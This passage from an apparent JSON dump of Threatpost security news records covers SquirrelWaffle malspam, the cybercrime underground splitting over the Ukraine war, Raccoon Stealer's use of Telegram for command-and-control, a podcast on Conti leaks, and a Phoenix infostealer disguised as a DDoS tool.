\u201cUsing these standards can make it harder for an attacker to send spoofed emails impersonating your domain,\u201d Sophos said.\n * Consider email security products that integrate artificial intelligence to help fend off increasingly sophisticated social engineering attacks, phishing lures and impersonation messages.\n * Protect the recipients of such emails and ensure that users in your organization can spot phishing attempts and know how to report and respond to them.\n\nSophos also provided tips on what to do if your organization has already been attacked. In fact, it\u2019s put together a [Squirrelwaffle Incident Guide](<https://news.sophos.com/en-us/2022/02/15/rapid-response-the-squirrelwaffle-incident-guide/>) to help victims investigate, analyze and respond.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T22:31:33", "type": "threatpost", "title": "SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T22:31:33", "id": "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "href": "https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T14:53:14", "description": "A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.\n\nAccording to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, 
ever since the outbreak of war in Ukraine, \u201cpreviously coexisting, financially motivated threat actors divided along ideological factions.\u201d\n\n\u201cPro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,\u201d wrote researchers from Accenture\u2019s Cyber Threat Intelligence (ACTI). \u201cHowever, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting \u2018enemies of Russia,\u2019 especially Western entities due to their claims of Western warmongering.\u201d\n\n## The Russia-Ukraine Cyber Warzone\n\nHistorically, the world\u2019s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors \u2013 a range of cybercriminals that includes even low-level carders, scammers and script kiddies.\n\nTogether, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own. For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).\n\nThis productivity is underpinned by not only a shared language, but a shared cultural and political alignment. 
As ACTI noted in its report, \u201cthese forums previously employed a strict, \u2018no work in CIS\u2019 policy.\u201d The CIS \u2013 Commonwealth of Independent States \u2013 is a post-Soviet conglomeration of Russia and Central Asian states.\n\nWith the outbreak of war, however, this harmony is fracturing.\n\nOne poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: \u201cAre you against work on RU and CIS?\u201d 82.6 percent of respondents responded \u201cYes,\u201d but a surprisingly large minority \u2013 17.4 percent \u2013 responded \u201cNo.\u201d\n\n## No Love For Moscow\n\nOn Feb. 27, an admin from RaidForums \u2013 an online marketplace for trafficking data from high-profile database leaks \u2013 published a statement titled \u201cRAIDFORUMS SANCTIONS ON RUSSIA.\u201d\n\n> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.\n\nShortly after the statement was published, RaidForums\u2019 main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.\n\nThe same is true in the opposite direction. The conflict \u201chas led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,\u201d researchers wrote, and inspired increased attacks against Western targets.\n\n## How This Will Hurt the West\n\nIt might appear, at first glance, that civil war in the cyber underground is a good thing. 
After all, if they\u2019re fighting each other they won\u2019t have time to annoy the rest of us, right?\n\nIn fact, the exact opposite is true.\n\n\u201cThe primary effect of this political divide so far,\u201d the researchers observed, \u201cis an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on \u2018enemies of Russia.\u2019\u201d\n\nNationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.\n\nIn response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response \u2013 to avoid getting the stink on them, too \u2013 underground admins banned those groups.\n\n\u201cWhile ransomware actors did not disappear from the underground,\u201d wrote the researchers, \u201cthe ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors\u2019 abilities to scale their operations.\u201d\n\nNow, \u201cmany underground actors call for the return of ransomware groups to the mainstream underground.\u201d\n\nThe consequence of bringing ransomware groups back into the fold \u201cwould not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors\u2019 return and give those ransomware actors perceived moral reason to conduct attacks,\u201d the report concluded.\n\n## Increasingly Targeting Critical Infrastructure\n\nThe report described an increasing volume of attacks against the West, \u201cespecially in the resources, government, media, financial and insurance industries.\u201d 
\u201cThe targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations\u2019 importance as critical national infrastructure.\u201d\n\nCritical infrastructure will be of particular concern, especially if ransomware groups have the political motive \u2013 plus the tools of the rest of the underground community at their disposal.\n\n\u201cOrganizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,\u201d James McQuiggan of KnowBe4 told Threatpost via email, but \u201ccybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.\u201d\n\nIf the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?\n\nThe answer to that question may arrive soon.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "published": "2022-03-14T13:52:37", "type": "threatpost", "title": "Cybercrooks\u2019 Political In-Fighting Threatens the West", "bulletinFamily": "info", "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T13:52:37", "id": "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "href": "https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/"}, {"lastseen": "2022-03-11T15:13:04", "description": "A credential stealer that first rose to popularity a couple of years ago is now abusing Telegram for command-and-control (C2). 
A range of cybercriminals continue to widen its attack surface through creative distribution means like this, researchers have reported.\n\n[Raccoon Stealer](<https://threatpost.com/malwarebytes-copycat-site-raccoon-stealer/154638/>), which first appeared on the scene in April 2019, has added the ability to store and update its own actual C2 addresses on Telegram\u2019s infrastructure, according to a blog post published by [Avast Threat Labs](<https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/>) this week. This gives them a \u201cconvenient and reliable\u201d command center on the platform that they can update on the fly, researchers said.\n\nThe malware \u2013 believed to be developed and maintained by Russia-affiliated cybercriminals \u2013 is at its core a credential stealer but is capable of a range of nefarious activity. It can steal not only passwords but also cookies, saved logins and forms data from browsers, login credentials from email clients and messengers, files from crypto wallets, data from browser plugins and extensions, and arbitrary files, based on commands from its C2.\n\n\u201cIn addition, it\u2019s able to download and execute arbitrary files by command from its C2,\u201d Avast Threat Labs researcher [Vladimir Martyanov](<https://decoded.avast.io/author/vladimirmartyanov/>) wrote in the post. 
This, in combination with active development and promotion on underground forums, makes Raccoon Stealer \u201cprevalent and dangerous,\u201d he said.\n\nUpon its release in 2019, cybercriminals [quickly adopted](<https://threatpost.com/raccoon-malware-steal-data/149525/>) the malware because of its user-friendly malware-as-a-service (MaaS) model, which has given them a quick and easy way to make money by stealing sensitive data.\n\n## **Creative Distribution**\n\nEarly on, attackers were seen delivering Raccoon Stealer [via an .IMG file](<https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/>) hosted on a hacker-controlled Dropbox account in business email compromise (BEC) campaigns that targeted financial institutions and other organizations.\n\nMore recently, Avast Threat Labs researchers observed a number of new and creative ways attackers are distributing Raccoon Stealer, Martyanov said.\n\n\u201cTaking into account that Raccoon Stealer is for sale, its distribution techniques are limited only by the imagination of the end buyers,\u201d he wrote.\n\nIn addition to being spread by two loaders \u2013 Buer Loader and GCleaner \u2013 attackers also are distributing Raccoon Stealer via fake game cheats, patches for cracked software \u2013 including hacks and mods for Fortnite, Valorant and NBA2K22 \u2013 or other software, Martyanov wrote.\n\nCybercriminals also are taking care to try to evade detection by packing the credential stealer, using Themida or malware packers, with some samples observed being packed more than five times in a row with the same packer, he added.\n\n## **Abusing C2 in Telegram**\n\nThe report detailed how the latest version of Raccoon Stealer communicates with C2 within Telegram: There are four \u201ccrucial\u201d values for its C2 communication, which are hardcoded in every Raccoon Stealer sample, according to the post. 
They are:\n\n * MAIN_KEY, which has been changed four times during the year;\n * URLs of Telegram gates with a channel name;\n * BotID, a hexadecimal string, sent to the C2 every time; and\n * TELEGRAM_KEY, a key to decrypt the C2 address obtained from the Telegram gate.\n\nTo hijack Telegram for its C2, the malware first decrypts MAIN_KEY, which it uses to decrypt the Telegram gate URLs and BotID. The stealer then uses the Telegram gate to get to its real C2 using a string of queries that eventually allow it to use the Telegram infrastructure to store and update actual C2 addresses, Martyanov wrote.\n\nBy downloading and executing arbitrary files from a command from C2, the stealer also is able to distribute malware. Avast Threat Labs collected about 185 files, with a total size of 265 megabytes \u2013 including downloaders, clipboard crypto stealers and the WhiteBlackCrypt ransomware \u2013 that were being distributed by Raccoon Stealer.\n\n## **Avoiding Russian Entities**\n\nOnce executed, Raccoon Stealer starts checking for the default user locale set on the infected device and won\u2019t work if it\u2019s one of the following: Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik or Uzbek. This is likely because the developers themselves are Russian, researchers believe.\n\nHowever, Avast Threat Labs found that in recent activity, \u201cthe country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don\u2019t want to infect computers in Russia or Central Asia,\u201d Martyanov wrote.\n\nThis could be because \u201cthe attacks spray and pray, distributing the malware around the world,\u201d he noted. 
The malware doesn\u2019t check for the location of the user until it actually reaches a device; if it finds that the device is located in a region developers don\u2019t want to target, it won\u2019t run.\n\n\u201cThis explains why we detected so many attack attempts in Russia; we block the malware before it can run, i.e. before it can even get to the stage where it checks for the device\u2019s locale,\u201d Martyanov wrote. \u201cIf an unprotected device that comes across the malware with its locale set to English or any other language that is not on the exception list but is in Russia, it would still become infected.\u201d\n", "published": "2022-03-11T15:03:20", "type": "threatpost", "title": "Raccoon Stealer Crawls Into Telegram", "bulletinFamily": "info", "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T15:03:20", "id": "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "href": "https://threatpost.com/raccoon-stealer-telegram/178881/"}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. 
and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been poring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript.\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. 
Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. 
So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. 
And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. 
So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. 
I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland.\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you.\u201d Except for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia:** As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. 
I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologon was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. 
And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehose is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. 
I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil, that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinny, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. 
\n\n", "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/"}, {"lastseen": "2022-03-11T14:53:17", "description": "Looking to cyber-hassle Russia, Ukrainian sympathizers? 
Be careful \u2014 malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.\n\nIn a Wednesday [threat advisory](<https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html>), Cisco Talos described a campaign it\u2019s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram, that\u2019s purportedly meant to pummel Russian websites.\n\nIn truth, the file is actually the Phoenix infostealer that\u2019s after credentials and cryptocurrency info, according to researchers.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\nResearchers shared one such Telegram come-on, shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg>)\n\nInfostealer disguised as a Russian attack tool on Telegram. 
Source: Cisco Talos.\n\n\u201cWe are glad to remind you about the software we use to attack Russian sites!\u201d the message burbled, waiting to jump on unsuspecting users so as to bleed them of cryptocurrency stored in wallets and MetaMask (a cryptocurrency wallet software commonly associated with non-fungible tokens [NFTs]).\n\n## Cyber-Warzone Flooded with New Threats, Hacker Newbies\n\nThe malware dressed in sheep\u2019s clothing is just one more wrinkle in the cyber-threat landscape \u2013 a landscape that been undergoing seismic shifts leading up to and during Russia\u2019s invasion of Ukraine. The crisis has brought both new threats and an influx of actors \u201cof varying skill,\u201d Cisco said.\n\nFor example, the cyber-warzone has entailed the Conti ransomware gang\u2019s secrets [getting spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) (including a [decryptor and TrickBot code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>)) by a Ukrainian security researcher (per [KrebsOnSecurity](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>), citing Alex Holden, the Ukrainian-born founder of the Milwaukee-based cyber intelligence firm Hold Security), a pro-Ukrainian member; furious phishing campaigns [launched](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) against Ukraine and [those aiding](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) Ukrainian refugees; the novel FoxBlade [trojan;](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) DDoS [attacks](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against Ukraine\u2019s military and economy; campaigns using multiple destructive [wipers;](<https://threatpost.com/destructive-wiper-ukraine/177768/>) hackers affiliating themselves with 
the Anonymous collective [hijacking](<https://www.taiwannews.com.tw/en/news/4466470>) Russian cameras; and more.\n\n\u201cMany of these changes have been brought about by the rise in attacks being[ outsourced](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) to sympathetic people on the internet, which brings about its own unique challenges and threats,\u201d Cisco [outlined](<https://blog.talosintelligence.com/2022/03/ukraine-update.html>). The threat advisory referenced a [tweet](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) exhorting people to join an IT army to fight on the cyber-front.\n\n> We are creating an IT army. We need digital talents. All operational tasks will be given here: <https://t.co/Ie4ESfxoSn>. There will be tasks for everyone. We continue to fight on the cyber front. The first task is on the channel for cyber specialists.\n> \n> \u2014 Mykhailo Fedorov (@FedorovMykhailo) [February 26, 2022](<https://twitter.com/FedorovMykhailo/status/1497642156076511233?ref_src=twsrc%5Etfw>)\n\nSoldiers on the frontlines get shot at, of course, and soldiers on the cyber-frontlines run the risk of getting arrested. After all, no matter how noble the hacking 